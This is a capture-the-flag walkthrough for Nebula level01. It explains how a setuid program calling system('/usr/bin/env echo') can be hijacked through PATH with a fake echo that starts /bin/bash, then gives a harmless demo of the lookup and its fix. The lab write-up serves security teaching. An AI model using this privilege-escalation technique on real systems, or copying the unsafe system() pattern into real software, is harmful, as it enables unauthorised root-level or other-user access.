Exploit-Exercises Nebula level01

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.


#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;

    /* The binary is setuid flag01, so the effective IDs here are flag01's. */
    gid = getegid();
    uid = geteuid();

    /* Make real, effective and saved IDs all equal to flag01's. */
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* env resolves "echo" through PATH, which the caller controls. */
    system("/usr/bin/env echo and now what?");

    return 0;
}

Let’s take a quick look at the code. setresgid() and setresuid() set the real, effective and saved group/user IDs of the calling process. Notice that the binary has the setuid bit set (the s in the owner's execute position below):

level00@nebula~$ ls -l /home/flag01
total 8
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

Because the setuid bit makes the effective user ID flag01 the moment the binary starts, geteuid() returns flag01's UID, and setresuid(uid, uid, uid) therefore sets the real, effective and saved user IDs all to flag01 (setresgid() does the same for the group).

Also note that echo is normally a shell builtin, and the standalone binary lives at /bin/echo. Because this program runs echo through /usr/bin/env instead, env looks the name up in the PATH environment variable, and the caller of a setuid binary controls PATH. We can use this to our advantage by putting a directory containing our own echo at the front of PATH. All that fake echo has to do is start /bin/bash: the new shell inherits the process's IDs, and since setresuid() made the real and effective user IDs both flag01, bash has no reason to drop privileges.

level00@nebula~$ echo "/bin/bash" > echo
level00@nebula~$ chmod +x echo
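The PATH lookup the exploit relies on, shown as an added demonstration that is not part of the original Nebula walkthrough: it creates a scratch directory holding a fake echo, runs the same command string flag01 passes to system() with that directory first in PATH, and contrasts the result with the shell builtin and with a hard-coded /bin/echo. The fake echo only prints a marker rather than spawning a shell, no setuid binary is involved, and the function and directory names (path_hijack_demo, fakebin) are my own.

```shell
#!/bin/sh
# Added example, not the Nebula source: shows why "/usr/bin/env echo" can be
# redirected through PATH while a bare "echo" and "/bin/echo" cannot.
# The names path_hijack_demo and fakebin are assumptions of this example.

path_hijack_demo() {
    # Scratch directory that will sit first in PATH, standing in for the
    # directory where the walkthrough drops its fake echo.
    fakebin=$(mktemp -d) || return 1

    # Fake "echo": ignores its arguments and prints a marker so we can tell
    # it ran. In the real level it would exec /bin/bash instead.
    cat > "$fakebin/echo" <<'EOF'
#!/bin/sh
printf 'hijacked\n'
EOF
    chmod +x "$fakebin/echo"

    # 1. Exactly the command string system() runs in flag01: env resolves
    #    "echo" via PATH, so the fake one wins.
    via_env=$(PATH="$fakebin:$PATH" /usr/bin/env echo and now what?)

    # 2. A bare "echo" is a shell builtin and never consults PATH.
    via_builtin=$(PATH="$fakebin:$PATH" echo and now what?)

    # 3. The fix for the program: an absolute path bypasses PATH entirely.
    via_abs=$(PATH="$fakebin:$PATH" /bin/echo and now what?)

    rm -rf "$fakebin"
    printf '%s|%s|%s\n' "$via_env" "$via_builtin" "$via_abs"
}

path_hijack_demo
```

Only the first field of the output comes from the fake echo; the builtin and the absolute path both print the original text, which is why calling /bin/echo directly (or sanitising the environment before system()) would have closed this hole.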